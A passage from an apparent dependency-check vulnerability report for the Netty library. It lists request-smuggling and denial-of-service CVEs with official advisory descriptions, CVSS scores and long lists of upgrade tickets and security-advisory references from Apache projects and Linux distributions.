[pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [spark-issues] 20200309 [jira] [Created] (SPARK-31095) Upgrade netty version to fix security vulnerabilities - [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445 - [spark-reviews] 20200310 [GitHub] [spark] dongjoon-hyun commented on issue #27870: [SPARK-31095][BUILD][2.4] Upgrade netty-all to 4.1.47.Final - [zookeeper-dev] 20200203 Re: [VOTE] Apache ZooKeeper release 3.6.0 candidate 1 - [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E DEBIAN - DSA-4885 MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final MISC - https://github.com/netty/netty/issues/9861 MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-20445] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20445 OSSIndex - https://github.com/netty/netty/issues/9861 OSSIndex - https://github.com/netty/netty/pull/9865 OSSIndex - https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E REDHAT - RHSA-2020:0497 REDHAT - RHSA-2020:0567 REDHAT - RHSA-2020:0601 REDHAT - RHSA-2020:0605 REDHAT - RHSA-2020:0606 REDHAT - RHSA-2020:0804 REDHAT - RHSA-2020:0805 REDHAT - RHSA-2020:0806 REDHAT - RHSA-2020:0811 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-16869 suppress
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444) - [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15418) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 for Cassendra 2.2.5 - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [cassandra-commits] 20210526 [jira] [Created] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty - [cassandra-commits] 20210526 [jira] [Updated] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty - [cassandra-commits] 20210924 [jira] [Commented] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [cassandra-commits] 20210924 [jira] [Updated] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities - [drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities - [drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities - [druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [olingo-dev] 20191206 [jira] [Assigned] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Created] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Resolved] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Updated] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191209 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191227 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] codecov-io commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] coveralls commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] crazywen opened a new pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [spark-issues] 20191219 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191219 [jira] [Created] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191219 [jira] [Updated] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Comment Edited] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Issue Comment Deleted] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Reopened] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Resolved] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [tinkerpop-commits] 20191022 [tinkerpop] branch tp34 updated: Bump to Netty 4.1.42 fixes CVE-2019-16869 - CTR - [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869 - [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5.6 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869 - [zookeeper-commits] 20191003 [zookeeper] branch master updated: ZOOKEEPER-3563: Update Netty to address CVE-2019-16869 - [zookeeper-dev] 20190930 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-dev] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869 - [zookeeper-dev] 20191001 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-dev] 20191002 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-issues] 20190930 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869 - [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty with CVE-2019-16869 - [zookeeper-issues] 20191001 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191003 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191008 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191008 [jira] [Resolved] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty BUGTRAQ - 20200105 [SECURITY] [DSA 4597-1] netty security update DEBIAN - DSA-4597 MISC - https://github.com/netty/netty/compare/netty-4.1.41.Final...netty-4.1.42.Final MISC - https://github.com/netty/netty/issues/9571 MLIST - [debian-lts-announce] 20190930 [SECURITY] [DLA 1941-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-16869] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16869 OSSIndex - https://github.com/netty/netty/issues/9571 REDHAT - RHSA-2019:3892 REDHAT - RHSA-2019:3901 REDHAT - RHSA-2020:0159 REDHAT - RHSA-2020:0160 REDHAT - RHSA-2020:0161 REDHAT - RHSA-2020:0164 REDHAT - RHSA-2020:0445 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2020-11612 suppress
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final - [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48) - [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022 - [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final - [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0 - [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: 